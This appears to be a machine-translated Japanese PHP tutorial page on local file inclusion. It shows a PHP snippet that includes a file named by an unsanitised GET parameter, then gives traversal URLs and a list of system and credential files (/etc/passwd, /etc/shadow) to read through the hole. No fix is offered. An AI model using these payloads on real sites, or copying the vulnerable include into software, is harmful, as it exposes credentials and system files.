記事特集学ぶダウンロードに質問プログラミング辞典ゲーム最近の更新

简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)

ホームページ > バックエンド開発 > PHPチュートリアル > 本文

PHP は脆弱なコードを含むローカルファイルを偽装します_PHP チュートリアル

WBOY

リリース： 2016-07-21 15:23:40

オリジナル

1027 人が閲覧しました

コード:

コードをコピーしますコードは次のとおりです:

 
$page=$_GET['page']; 
include($page.'php');

こんな感じで使えます
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=。 ./../ ../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

さらにデータを取得:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/セキュリティ/制限
/usr/lib/security/mkuser.default

hackteach より

関連ラベル：

get include page php コード偽造含むコピー書類地元抜け穴の

ソース：php.cn

前の記事：PHP+MYSQL会員制ログインと権限判定実装コード_PHPチュートリアル次の記事：PHP 配列関数シーケンス ksort() は、配列の要素キー名を昇順にソートし、インデックス関係を維持します_PHP チュートリアル

このウェブサイトの声明

この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

著者別の最新記事

NullPointerException とは何ですか?どのように修正すればよいですか?

2024-10-22 09:46:29
初心者からプログラマーへ: 旅は C の基礎から始まります

2024-10-13 13:53:41
PHP による Web 開発のロックを解除する: 初心者ガイド

2024-10-12 12:15:51
C の謎を解く: 新人プログラマーのための明確でシンプルな道

2024-10-11 22:47:31
コーディングの可能性を解き放つ: まったくの初心者のための C プログラミング

2024-10-11 19:36:51
内なるプログラマーを解き放つ: まったくの初心者のための C

2024-10-11 15:50:41
C で生活を自動化する: 初心者向けのスクリプトとツール

2024-10-11 15:07:41
PHP を簡単に: Web 開発の最初のステップ

2024-10-11 14:21:21
Python で何でも構築: 創造性を解き放つための初心者ガイド

2024-10-11 12:59:11
コーディングの鍵: 初心者のための Python の力を解き放つ

2024-10-11 12:17:31

最新の問題

URL パラメータから取得した PHP 配列が期待どおりに動作しないカテゴリ ID を含む URL パラメータがあり、それを次のような配列として扱いたいと考えています: http://example.com?cat[]=3,9,13 PHP では、...

から 2024-04-06 22:09:02

0

1

1428

ApacheのどこにCustomLogディレクティブを配置すればよいですか私はphp:7.2-apachedockerを使用しています。ヘルスチェック URL ログインアクセスログを無効にする必要があります。このリンクに基づいて、Customlog ...

から 2024-04-06 22:03:59

0

1

990

戻り値の変数の形式は何ですか? 私はphpの初心者です。コードを見つけました: if($x<time()){return[false,'error'];} ロジックや変数は重要ではありませんが、[false...

から 2024-04-06 21:55:20

0

1

778

opentbs を使用して odt ファイルを生成するときに発生する問題: 同じキーの値が別の列ではなく同じ行に表示されます。 PHPでodtを作成するためにOpenTbsというライブラリを使っていますが、列と行が動的に生成されるので利用しています。行と列の作成方法は知っていますが、それらを整理する方法がわ...

から 2024-04-06 20:18:18

0

1

483

ループするために MySQL の結果を ID ごとにグループ化する mysqlにフライトデータを含むテーブルがあります。 codeigniter3Journey_idair_idFlightDurationout_or_inflightdurati...

から 2024-04-06 17:27:56

0

1

406

関連トピック

詳細>

人気のおすすめ

人気のチュートリアル

詳細>

関連するチュートリアル

人気のおすすめ

最新のコース

最新のダウンロード

詳細>

ウェブエフェクト

公式サイト

サイト素材

フロントエンドテンプレート

私たちについて免責事項 Sitemap: PHP中国語ウェブサイト：福祉オンライン PHP トレーニング，PHP 学習者の迅速な成長を支援します！